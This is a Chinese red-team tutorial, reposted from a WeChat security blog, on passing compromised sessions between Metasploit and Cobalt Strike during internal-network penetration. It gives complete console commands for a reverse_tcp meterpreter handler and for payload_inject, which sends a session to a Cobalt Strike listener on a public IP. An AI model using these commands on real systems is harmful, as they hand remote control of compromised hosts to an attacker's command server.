内网渗透|MSF和CobaltStrike联动

admin 2022年2月28日16:15:09评论92 views字数 1187阅读3分57秒阅读模式
MSF和CobaltStrike联动


内网渗透|MSF和CobaltStrike联动
目录
内网渗透|MSF和CobaltStrike联动

当获取了CobaltStrike类型的session后,想派生一个MSF类型的shell

当获取了MSF类型的session后,想派生一个CobaltStrike类型的shell


内网渗透|MSF和CobaltStrike联动

当获取了CobaltStrike类型的session后,想派生一个MSF类型的shell


内网渗透|MSF和CobaltStrike联动


内网渗透|MSF和CobaltStrike联动
内网渗透|MSF和CobaltStrike联动

在MSF上的操作:

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.10.11set lport 4444exploit -j


内网渗透|MSF和CobaltStrike联动

在CobaltStrike上的操作

开启一个监听器Listener,HOST和PORT填我们MSF监听的地址(这里需要注意,如果我们的MSF也是在内网中的话,需要将MSF的端口映射到公网地址),这里我们将Kali的端口映射到了公网的 server.natappfree.cc:38615 (112.74.89.58:38615 )。
如果我们的公网VPS上安装了MSF的话 ,就不需要映射端口了。

内网渗透|MSF和CobaltStrike联动

这里一定要注意,创建的Listener是foreign!

内网渗透|MSF和CobaltStrike联动

然后选中计算机,右键->Spawn,选择刚刚创建的监听器MSF,然后我们的MSF即可看到成功获取了meterpreter会话

内网渗透|MSF和CobaltStrike联动

内网渗透|MSF和CobaltStrike联动
内网渗透|MSF和CobaltStrike联动



内网渗透|MSF和CobaltStrike联动

当获取了MSF类型的session后,想派生一个CobaltStrike类型的shell


内网渗透|MSF和CobaltStrike联动

内网渗透|MSF和CobaltStrike联动
内网渗透|MSF和CobaltStrike联动

注:只有meterpreter类型的session才能派生给CS

我们现在获得了一个MSF的meterpreter类型的session,session id为1

首先在CobaltStrike上开启Listener,

内网渗透|MSF和CobaltStrike联动

然后在MSF中进行如下操作

use exploit/windows/local/payload_injectset payload windows/meterpreter/reverse_httpset DisablePayloadHandler true   #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为trueset lhost 48.94.225.140         #cobaltstrike监听的ipset lport 14444                 #cobaltstrike监听的端口 set session 1                   #这里是获得的session的idexploit

内网渗透|MSF和CobaltStrike联动

这样,我们的CobaltStrike上就可以收到MSF弹回来的session了。

内网渗透|MSF和CobaltStrike联动
内网渗透|MSF和CobaltStrike联动


END


来源:谢公子博客

责编:Vivian

内网渗透|MSF和CobaltStrike联动

内网渗透|MSF和CobaltStrike联动
内网渗透|MSF和CobaltStrike联动
如果文中有错误的地方,欢迎指出。有想转载的,可以留言我加白名单。
最后,欢迎加入谢公子的小黑屋(安全交流群)(QQ群:783820465)
内网渗透|MSF和CobaltStrike联动
内网渗透|MSF和CobaltStrike联动

内网渗透|MSF和CobaltStrike联动

本文始发于微信公众号(谢公子学安全):内网渗透|MSF和CobaltStrike联动

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月28日16:15:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透|MSF和CobaltStrike联动https://cn-sec.com/archives/484049.html

发表评论

匿名网友 填写信息